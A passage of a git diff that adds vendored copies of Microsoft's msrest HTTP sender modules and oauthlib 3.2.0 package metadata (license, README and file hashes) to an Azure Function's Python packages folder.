Optional[Callable] = None) -> AsyncIteratorType[bytes]: + """Generator for streaming request body data. + + :param callback: Custom callback for monitoring progress. + :param int chunk_size: + """ + return TrioStreamDownloadGenerator( + self.internal_response, + callback, + chunk_size + ) + + + class AsyncTrioBasicRequestsHTTPSender(BasicRequestsHTTPSender, AsyncHTTPSender): # type: ignore + + async def __aenter__(self): + return super(AsyncTrioBasicRequestsHTTPSender, self).__enter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + return super(AsyncTrioBasicRequestsHTTPSender, self).__exit__() + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. + """ + # It's not recommended to provide its own session, and is mostly + # to enable some legacy code to plug correctly + session = kwargs.pop('session', self.session) + + trio_limiter = kwargs.get("trio_limiter", None) + future = trio.to_thread.run_sync( + functools.partial( + session.request, + request.method, + request.url, + **kwargs + ), + limiter=trio_limiter + ) + try: + return TrioAsyncRequestsClientResponse( + request, + await future + ) + except requests.RequestException as err: + msg = "Error occurred in request." + raise_with_traceback(ClientRequestError, msg, err) + + class AsyncTrioRequestsHTTPSender(AsyncTrioBasicRequestsHTTPSender, RequestsHTTPSender): # type: ignore + + async def send(self, request: ClientRequest, **kwargs: Any) -> AsyncClientResponse: # type: ignore + """Send the request using this HTTP sender. 
+ """ + requests_kwargs = self._configure_send(request, **kwargs) + return await super(AsyncTrioRequestsHTTPSender, self).send(request, **requests_kwargs) + +except ImportError: + # trio not installed + pass \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py new file mode 100644 index 0000000..9652528 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/universal_http/requests.py @@ -0,0 +1,464 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +""" +This module is the requests implementation of Pipeline ABC +""" +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import contextlib +import logging +import threading +from typing import TYPE_CHECKING, List, Callable, Iterator, Any, Union, Dict, Optional # pylint: disable=unused-import +import warnings + +try: + from configparser import NoOptionError +except ImportError: + from ConfigParser import NoOptionError # type: ignore + +from oauthlib import oauth2 +import requests +from requests.models import CONTENT_CHUNK_SIZE + +from urllib3 import Retry # Needs requests 2.16 at least to be safe + +from ..exceptions import ( + TokenExpiredError, + ClientRequestError, + raise_with_traceback) +from . import HTTPSender, HTTPClientResponse, ClientResponse, HTTPSenderConfiguration + +if TYPE_CHECKING: + from . 
import ClientRequest  # pylint: disable=unused-import
+
+
+_LOGGER = logging.getLogger(__name__)
+
+
+class HTTPRequestsClientResponse(HTTPClientResponse):
+    def __init__(self, request, requests_response):
+        super(HTTPRequestsClientResponse, self).__init__(request, requests_response)
+        self.status_code = requests_response.status_code
+        self.headers = requests_response.headers
+        self.reason = requests_response.reason
+
+    def body(self):
+        return self.internal_response.content
+
+    def text(self, encoding=None):
+        if encoding:
+            self.internal_response.encoding = encoding
+        return self.internal_response.text
+
+    def raise_for_status(self):
+        self.internal_response.raise_for_status()
+
+class RequestsClientResponse(HTTPRequestsClientResponse, ClientResponse):
+
+    def stream_download(self, chunk_size=None, callback=None):
+        # type: (Optional[int], Optional[Callable]) -> Iterator[bytes]
+        """Generator for streaming request body data.
+
+        :param callback: Custom callback for monitoring progress.
+        :param int chunk_size:
+        """
+        chunk_size = chunk_size or CONTENT_CHUNK_SIZE
+        with contextlib.closing(self.internal_response) as response:
+            # https://github.com/PyCQA/pylint/issues/1437
+            for chunk in response.iter_content(chunk_size):  # pylint: disable=no-member
+                if not chunk:
+                    break
+                if callback and callable(callback):
+                    callback(chunk, response=response)
+                yield chunk
+
+
+class BasicRequestsHTTPSender(HTTPSender):
+    """Implements a basic requests HTTP sender.
+
+    Since the requests team recommends using one session per request, you should
+    not consider this class thread-safe, since it will use one Session
+    per instance.
+
+    In this simple implementation:
+    - You provide the configured session if you want to, or a basic session is created.
+    - All kwargs received by "send" are sent to session.request directly
+    """
+
+    def __init__(self, session=None):
+        # type: (Optional[requests.Session]) -> None
+        self.session = session or requests.Session()
+
+    def __enter__(self):
+        # type: () -> BasicRequestsHTTPSender
+        return self
+
+    def __exit__(self, *exc_details):  # pylint: disable=arguments-differ
+        self.close()
+
+    def close(self):
+        self.session.close()
+
+    def send(self, request, **kwargs):
+        # type: (ClientRequest, Any) -> ClientResponse
+        """Send request object according to configuration.
+
+        Allowed kwargs are:
+        - session : will override the driver session and use yours. Should NOT be done unless really required.
+        - anything else is sent straight to requests.
+
+        :param ClientRequest request: The request object to be sent.
+        """
+        # It's not recommended to provide your own session; this is mostly
+        # to enable some legacy code to plug in correctly
+        session = kwargs.pop('session', self.session)
+        try:
+            response = session.request(
+                request.method,
+                request.url,
+                **kwargs)
+        except requests.RequestException as err:
+            msg = "Error occurred in request."
+            raise_with_traceback(ClientRequestError, msg, err)
+
+        return RequestsClientResponse(request, response)
+
+
+def _patch_redirect(session):
+    # type: (requests.Session) -> None
+    """Patch a session so the redirect policy is applied based on status code.
+
+    HTTP spec says that a 301/302 response to a non-HEAD/GET request should
+    NOT be redirected automatically. But requests does redirect, to follow
+    browsers more than the spec:
+    https://github.com/requests/requests/blob/f6e13ccfc4b50dc458ee374e5dba347205b9a2da/requests/sessions.py#L305-L314
+
+    This patches "requests" to be more HTTP compliant.
+
+    Note that this is super dangerous, since technically this is not public API.
+ """ + def enforce_http_spec(resp, request): + if resp.status_code in (301, 302) and \ + request.method not in ['GET', 'HEAD']: + return False + return True + + redirect_logic = session.resolve_redirects + + def wrapped_redirect(resp, req, **kwargs): + attempt = enforce_http_spec(resp, req) + return redirect_logic(resp, req, **kwargs) if attempt else [] + wrapped_redirect.is_msrest_patched = True # type: ignore + + session.resolve_redirects = wrapped_redirect # type: ignore + +class RequestsHTTPSender(BasicRequestsHTTPSender): + """A requests HTTP sender that can consume a msrest.Configuration object. + + This instance will consume the following configuration attributes: + - connection + - proxies + - retry_policy + - redirect_policy + - enable_http_logger + - hooks + - session_configuration_callback + """ + + _protocols = ['http://', 'https://'] + + # Set of authorized kwargs at the operation level + _REQUESTS_KWARGS = [ + 'cookies', + 'verify', + 'timeout', + 'allow_redirects', + 'proxies', + 'verify', + 'cert' + ] + + def __init__(self, config=None): + # type: (Optional[RequestHTTPSenderConfiguration]) -> None + self._session_mapping = threading.local() + self.config = config or RequestHTTPSenderConfiguration() + super(RequestsHTTPSender, self).__init__() + + @property # type: ignore + def session(self): + try: + return self._session_mapping.session + except AttributeError: + self._session_mapping.session = requests.Session() + self._init_session(self._session_mapping.session) + return self._session_mapping.session + + @session.setter + def session(self, value): + self._init_session(value) + self._session_mapping.session = value + + def _init_session(self, session): + # type: (requests.Session) -> None + """Init session level configuration of requests. + + This is initialization I want to do once only on a session. + """ + _patch_redirect(session) + + # Change max_retries in current all installed adapters + max_retries = self.config.retry_policy() + for protocol in self._protocols: + session.adapters[protocol].max_retries = max_retries + + def _configure_send(self, request, **kwargs): + # type: (ClientRequest, Any) -> Dict[str, str] + """Configure the kwargs to use with requests. + + See "send" for kwargs details. + + :param ClientRequest request: The request object to be sent. + :returns: The requests.Session.request kwargs + :rtype: dict[str,str] + """ + requests_kwargs = {} # type: Any + session = kwargs.pop('session', self.session) + + # If custom session was not create here + if session is not self.session: + self._init_session(session) + + session.max_redirects = int(self.config.redirect_policy()) + session.trust_env = bool(self.config.proxies.use_env_settings) + + # Initialize requests_kwargs with "config" value + requests_kwargs.update(self.config.connection()) + requests_kwargs['allow_redirects'] = bool(self.config.redirect_policy) + requests_kwargs['headers'] = self.config.headers.copy() + + proxies = self.config.proxies() + if proxies: + requests_kwargs['proxies'] = proxies + + # Replace by operation level kwargs + # We allow some of them, since some like stream or json are controlled by msrest + for key in kwargs: + if key in self._REQUESTS_KWARGS: + requests_kwargs[key] = kwargs[key] + + # Hooks. 
Deprecated, should be a policy + def make_user_hook_cb(user_hook, session): + def user_hook_cb(r, *args, **kwargs): + kwargs.setdefault("msrest", {})['session'] = session + return user_hook(r, *args, **kwargs) + return user_hook_cb + + hooks = [] + for user_hook in self.config.hooks: + hooks.append(make_user_hook_cb(user_hook, self.session)) + + if hooks: + requests_kwargs['hooks'] = {'response': hooks} + + # Configuration callback. Deprecated, should be a policy + output_kwargs = self.config.session_configuration_callback( + session, + self.config, + kwargs, + **requests_kwargs + ) + if output_kwargs is not None: + requests_kwargs = output_kwargs + + # If custom session was not create here + if session is not self.session: + requests_kwargs['session'] = session + + ### Autorest forced kwargs now ### + + # If Autorest needs this response to be streamable. True for compat. + requests_kwargs['stream'] = kwargs.get('stream', True) + + if request.files: + requests_kwargs['files'] = request.files + elif request.data: + requests_kwargs['data'] = request.data + requests_kwargs['headers'].update(request.headers) + + return requests_kwargs + + def send(self, request, **kwargs): + # type: (ClientRequest, Any) -> ClientResponse + """Send request object according to configuration. + + Available kwargs: + - session : will override the driver session and use yours. Should NOT be done unless really required. + - A subset of what requests.Session.request can receive: + + - cookies + - verify + - timeout + - allow_redirects + - proxies + - verify + - cert + + Everything else will be silently ignored. + + :param ClientRequest request: The request object to be sent. + """ + requests_kwargs = self._configure_send(request, **kwargs) + return super(RequestsHTTPSender, self).send(request, **requests_kwargs) + + +class ClientRetryPolicy(object): + """Retry configuration settings. + Container for retry policy object. 
+ """ + + safe_codes = [i for i in range(500) if i != 408] + [501, 505] + + def __init__(self): + self.policy = Retry() + self.policy.total = 3 + self.policy.connect = 3 + self.policy.read = 3 + self.policy.backoff_factor = 0.8 + self.policy.BACKOFF_MAX = 90 + + retry_codes = [i for i in range(999) if i not in self.safe_codes] + self.policy.status_forcelist = retry_codes + self.policy.method_whitelist = ['HEAD', 'TRACE', 'GET', 'PUT', + 'OPTIONS', 'DELETE', 'POST', 'PATCH'] + + def __call__(self): + # type: () -> Retry + """Return configuration to be applied to connection.""" + debug = ("Configuring retry: max_retries=%r, " + "backoff_factor=%r, max_backoff=%r") + _LOGGER.debug( + debug, self.retries, self.backoff_factor, self.max_backoff) + return self.policy + + @property + def retries(self): + # type: () -> int + """Total number of allowed retries.""" + return self.policy.total + + @retries.setter + def retries(self, value): + # type: (int) -> None + self.policy.total = value + self.policy.connect = value + self.policy.read = value + + @property + def backoff_factor(self): + # type: () -> Union[int, float] + """Factor by which back-off delay is incrementally increased.""" + return self.policy.backoff_factor + + @backoff_factor.setter + def backoff_factor(self, value): + # type: (Union[int, float]) -> None + self.policy.backoff_factor = value + + @property + def max_backoff(self): + # type: () -> int + """Max retry back-off delay.""" + return self.policy.BACKOFF_MAX + + @max_backoff.setter + def max_backoff(self, value): + # type: (int) -> None + self.policy.BACKOFF_MAX = value + +def default_session_configuration_callback(session, global_config, local_config, **kwargs): # pylint: disable=unused-argument + # type: (requests.Session, RequestHTTPSenderConfiguration, Dict[str,str], str) -> Dict[str, str] + """Configuration callback if you need to change default session configuration. + + :param requests.Session session: The session. + :param Configuration global_config: The global configuration. + :param dict[str,str] local_config: The on-the-fly configuration passed on the call. + :param dict[str,str] kwargs: The current computed values for session.request method. + :return: Must return kwargs, to be passed to session.request. If None is return, initial kwargs will be used. + :rtype: dict[str,str] + """ + return kwargs + +class RequestHTTPSenderConfiguration(HTTPSenderConfiguration): + """Requests specific HTTP sender configuration. + + :param str filepath: Path to existing config file (optional). + """ + + def __init__(self, filepath=None): + # type: (Optional[str]) -> None + + super(RequestHTTPSenderConfiguration, self).__init__() + + # Retry configuration + self.retry_policy = ClientRetryPolicy() + + # Requests hooks. Must respect requests hook callback signature + # Note that we will inject the following parameters: + # - kwargs['msrest']['session'] with the current session + self.hooks = [] # type: List[Callable[[requests.Response, str, str], None]] + + self.session_configuration_callback = default_session_configuration_callback + + if filepath: + self.load(filepath) + + def save(self, filepath): + """Save current configuration to file. + + :param str filepath: Path to file where settings will be saved. + :raises: ValueError if supplied filepath cannot be written to. 
+ """ + self._config.add_section("RetryPolicy") + self._config.set("RetryPolicy", "retries", str(self.retry_policy.retries)) + self._config.set("RetryPolicy", "backoff_factor", + str(self.retry_policy.backoff_factor)) + self._config.set("RetryPolicy", "max_backoff", + str(self.retry_policy.max_backoff)) + super(RequestHTTPSenderConfiguration, self).save(filepath) + + def load(self, filepath): + try: + self.retry_policy.retries = \ + self._config.getint("RetryPolicy", "retries") + self.retry_policy.backoff_factor = \ + self._config.getfloat("RetryPolicy", "backoff_factor") + self.retry_policy.max_backoff = \ + self._config.getint("RetryPolicy", "max_backoff") + except (ValueError, EnvironmentError, NoOptionError): + error = "Supplied config file incompatible." + raise_with_traceback(ValueError, error) + finally: + self._clear_config() + super(RequestHTTPSenderConfiguration, self).load(filepath) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py new file mode 100644 index 0000000..7b567fe --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/version.py @@ -0,0 +1,28 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +#: version of this package. 
Use msrest.__version__ instead +msrest_version = "0.7.1" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE new file mode 100644 index 0000000..5cf6b82 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/LICENSE @@ -0,0 +1,27 @@ +Copyright (c) 2019 The OAuthlib Community +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of this project nor the names of its contributors may + be used to endorse or promote products derived from this software without + specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
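Editor's note: with the vendored msrest files above in place, the sender layer can be exercised on its own. The following is a minimal usage sketch, not part of the diff; the URL and the retry/redirect values are illustrative placeholders, and only names defined in the files above (ClientRequest, RequestsHTTPSender, RequestHTTPSenderConfiguration) are used.

    from msrest.universal_http import ClientRequest
    from msrest.universal_http.requests import (
        RequestHTTPSenderConfiguration,
        RequestsHTTPSender,
    )

    # Configure retries and redirects once, then reuse the sender.
    config = RequestHTTPSenderConfiguration()
    config.retry_policy.retries = 5            # total/connect/read retries
    config.retry_policy.backoff_factor = 1.0   # exponential back-off factor
    config.redirect_policy.max_redirects = 5

    request = ClientRequest("GET", "https://example.com/api/items")
    with RequestsHTTPSender(config) as sender:
        # stream=False loads the body eagerly so body() is available.
        response = sender.send(request, stream=False)
        response.raise_for_status()
        print(response.status_code, len(response.body()))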
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA new file mode 100644 index 0000000..b852974 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/METADATA @@ -0,0 +1,181 @@ +Metadata-Version: 2.1 +Name: oauthlib +Version: 3.2.0 +Summary: A generic, spec-compliant, thorough implementation of the OAuth request-signing logic +Home-page: https://github.com/oauthlib/oauthlib +Author: The OAuthlib Community +Author-email: idan@gazit.me +Maintainer: Ib Lundgren +Maintainer-email: ib.lundgren@gmail.com +License: BSD +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: MacOS +Classifier: Operating System :: POSIX +Classifier: Operating System :: POSIX :: Linux +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: Implementation +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: Topic :: Software Development :: Libraries :: Python Modules +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +Provides-Extra: rsa +Requires-Dist: cryptography (>=3.0.0) ; extra == 'rsa' +Provides-Extra: signals +Requires-Dist: blinker (>=1.4.0) ; extra == 'signals' +Provides-Extra: signedtoken +Requires-Dist: cryptography (>=3.0.0) ; extra == 'signedtoken' +Requires-Dist: pyjwt (<3,>=2.0.0) ; extra == 'signedtoken' + +OAuthLib - Python Framework for OAuth1 & OAuth2 +=============================================== + +*A generic, spec-compliant, thorough implementation of the OAuth request-signing +logic for Python 3.6+.* + +.. image:: https://travis-ci.org/oauthlib/oauthlib.svg?branch=master + :target: https://travis-ci.org/oauthlib/oauthlib + :alt: Travis +.. image:: https://coveralls.io/repos/oauthlib/oauthlib/badge.svg?branch=master + :target: https://coveralls.io/r/oauthlib/oauthlib + :alt: Coveralls +.. image:: https://img.shields.io/pypi/pyversions/oauthlib.svg + :target: https://pypi.org/project/oauthlib/ + :alt: Download from PyPI +.. image:: https://img.shields.io/pypi/l/oauthlib.svg + :target: https://pypi.org/project/oauthlib/ + :alt: License +.. image:: https://app.fossa.io/api/projects/git%2Bgithub.com%2Foauthlib%2Foauthlib.svg?type=shield + :target: https://app.fossa.io/projects/git%2Bgithub.com%2Foauthlib%2Foauthlib?ref=badge_shield + :alt: FOSSA Status +.. image:: https://img.shields.io/readthedocs/oauthlib.svg + :target: https://oauthlib.readthedocs.io/en/latest/index.html + :alt: Read the Docs +.. image:: https://badges.gitter.im/oauthlib/oauthlib.svg + :target: https://gitter.im/oauthlib/Lobby + :alt: Chat on Gitter + + +.. 
image:: https://raw.githubusercontent.com/oauthlib/oauthlib/8d71b161fd145d11c40d55c9ab66ac134a303253/docs/logo/oauthlib-banner-700x192.png + :target: https://github.com/oauthlib/oauthlib/ + :alt: OAuth + Python = OAuthlib Python Framework + + +OAuth often seems complicated and difficult-to-implement. There are several +prominent libraries for handling OAuth requests, but they all suffer from one or +both of the following: + +1. They predate the `OAuth 1.0 spec`_, AKA RFC 5849. +2. They predate the `OAuth 2.0 spec`_, AKA RFC 6749. +3. They assume the usage of a specific HTTP request library. + +.. _`OAuth 1.0 spec`: https://tools.ietf.org/html/rfc5849 +.. _`OAuth 2.0 spec`: https://tools.ietf.org/html/rfc6749 + +OAuthLib is a framework which implements the logic of OAuth1 or OAuth2 without +assuming a specific HTTP request object or web framework. Use it to graft OAuth +client support onto your favorite HTTP library, or provide support onto your +favourite web framework. If you're a maintainer of such a library, write a thin +veneer on top of OAuthLib and get OAuth support for very little effort. + + +Documentation +-------------- + +Full documentation is available on `Read the Docs`_. All contributions are very +welcome! The documentation is still quite sparse, please open an issue for what +you'd like to know, or discuss it in our `Gitter community`_, or even better, send a +pull request! + +.. _`Gitter community`: https://gitter.im/oauthlib/Lobby +.. _`Read the Docs`: https://oauthlib.readthedocs.io/en/latest/index.html + +Interested in making OAuth requests? +------------------------------------ + +Then you might be more interested in using `requests`_ which has OAuthLib +powered OAuth support provided by the `requests-oauthlib`_ library. + +.. _`requests`: https://github.com/requests/requests +.. _`requests-oauthlib`: https://github.com/requests/requests-oauthlib + +Which web frameworks are supported? +----------------------------------- + +The following packages provide OAuth support using OAuthLib. + +- For Django there is `django-oauth-toolkit`_, which includes `Django REST framework`_ support. +- For Flask there is `flask-oauthlib`_ and `Flask-Dance`_. +- For Pyramid there is `pyramid-oauthlib`_. +- For Bottle there is `bottle-oauthlib`_. + +If you have written an OAuthLib package that supports your favorite framework, +please open a Pull Request, updating the documentation. + +.. _`django-oauth-toolkit`: https://github.com/evonove/django-oauth-toolkit +.. _`flask-oauthlib`: https://github.com/lepture/flask-oauthlib +.. _`Django REST framework`: http://django-rest-framework.org +.. _`Flask-Dance`: https://github.com/singingwolfboy/flask-dance +.. _`pyramid-oauthlib`: https://github.com/tilgovi/pyramid-oauthlib +.. _`bottle-oauthlib`: https://github.com/thomsonreuters/bottle-oauthlib + +Using OAuthLib? Please get in touch! +------------------------------------ +Patching OAuth support onto an http request framework? Creating an OAuth +provider extension for a web framework? Simply using OAuthLib to Get Things Done +or to learn? + +No matter which we'd love to hear from you in our `Gitter community`_ or if you have +anything in particular you would like to have, change or comment on don't +hesitate for a second to send a pull request or open an issue. We might be quite +busy and therefore slow to reply but we love feedback! 
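Editor's note: to make the "graft OAuth client support onto your favorite HTTP library" idea described above concrete, here is a minimal sketch of the OAuth2 web-application flow using oauthlib's public client API; the client id and URLs are placeholders.

    from oauthlib.oauth2 import WebApplicationClient

    client = WebApplicationClient("my-client-id")
    # Build the authorization URL; any HTTP stack can then send the user there.
    auth_url = client.prepare_request_uri(
        "https://provider.example.com/oauth/authorize",
        redirect_uri="https://app.example.com/callback",
        scope=["profile"],
        state="opaque-state-value",
    )
    print(auth_url)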
+ +Chances are you have run into something annoying that you wish there was +documentation for, if you wish to gain eternal fame and glory, and a drink if we +have the pleasure to run into eachother, please send a docs pull request =) + +.. _`Gitter community`: https://gitter.im/oauthlib/Lobby + +License +------- + +OAuthLib is yours to use and abuse according to the terms of the BSD license. +Check the LICENSE file for full details. + +Credits +------- + +OAuthLib has been started and maintained several years by Idan Gazit and other +amazing `AUTHORS`_. Thanks to their wonderful work, the open-source `community`_ +creation has been possible and the project can stay active and reactive to users +requests. + + +.. _`AUTHORS`: https://github.com/oauthlib/oauthlib/blob/master/AUTHORS +.. _`community`: https://github.com/oauthlib/ + +Changelog +--------- + +*OAuthLib is in active development, with the core of both OAuth1 and OAuth2 +completed, for providers as well as clients.* See `supported features`_ for +details. + +.. _`supported features`: https://oauthlib.readthedocs.io/en/latest/feature_matrix.html + +For a full changelog see ``CHANGELOG.rst``. + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD new file mode 100644 index 0000000..3b9e940 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib-3.2.0.dist-info/RECORD @@ -0,0 +1,142 @@ +oauthlib-3.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +oauthlib-3.2.0.dist-info/LICENSE,sha256=PR4S2KxSwLbBSK9tKR9yQAuHIO0WwKxKiYaLbRSxyTk,1530 +oauthlib-3.2.0.dist-info/METADATA,sha256=4BfXhM-eajiPmT96iyP4bykMyHf_Xz2pfggvcOyrNv0,7447 +oauthlib-3.2.0.dist-info/RECORD,, +oauthlib-3.2.0.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +oauthlib-3.2.0.dist-info/top_level.txt,sha256=gz2py0fFs1AhG1O7KpHPcIXOgXOwdIiCaSnmLkiR12Q,9 +oauthlib/__init__.py,sha256=mhqqb9kZLISCLzTMXwHwdDnS3q_7-NQciRNsQr_1q5M,686 +oauthlib/__pycache__/__init__.cpython-39.pyc,, +oauthlib/__pycache__/common.cpython-39.pyc,, +oauthlib/__pycache__/signals.cpython-39.pyc,, +oauthlib/__pycache__/uri_validate.cpython-39.pyc,, +oauthlib/common.py,sha256=FimXHIfgk-XVgzu3lq6-wv3Jsq7hzGgsurwGvTm3t3A,13422 +oauthlib/oauth1/__init__.py,sha256=U_6yHcB8jdYPbcas4CBel7tE_YYCN5S1300U3zVlWlE,1187 +oauthlib/oauth1/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__init__.py,sha256=-5sJHDG3JRZQRJYlCjkj3CP2jZgqEg0OY5pVIxE4mxE,16744 +oauthlib/oauth1/rfc5849/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/errors.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/parameters.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/request_validator.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/signature.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/__pycache__/utils.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__init__.py,sha256=SeIECziJ-Sv_NCGnowG3P9UnX_VdFNldRqRywEaJvxY,327 +oauthlib/oauth1/rfc5849/endpoints/__pycache__/__init__.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/access_token.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/authorization.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/base.cpython-39.pyc,, +oauthlib/oauth1/rfc5849/endpoints/__pycache__/pre_configured.cpython-39.pyc,, 
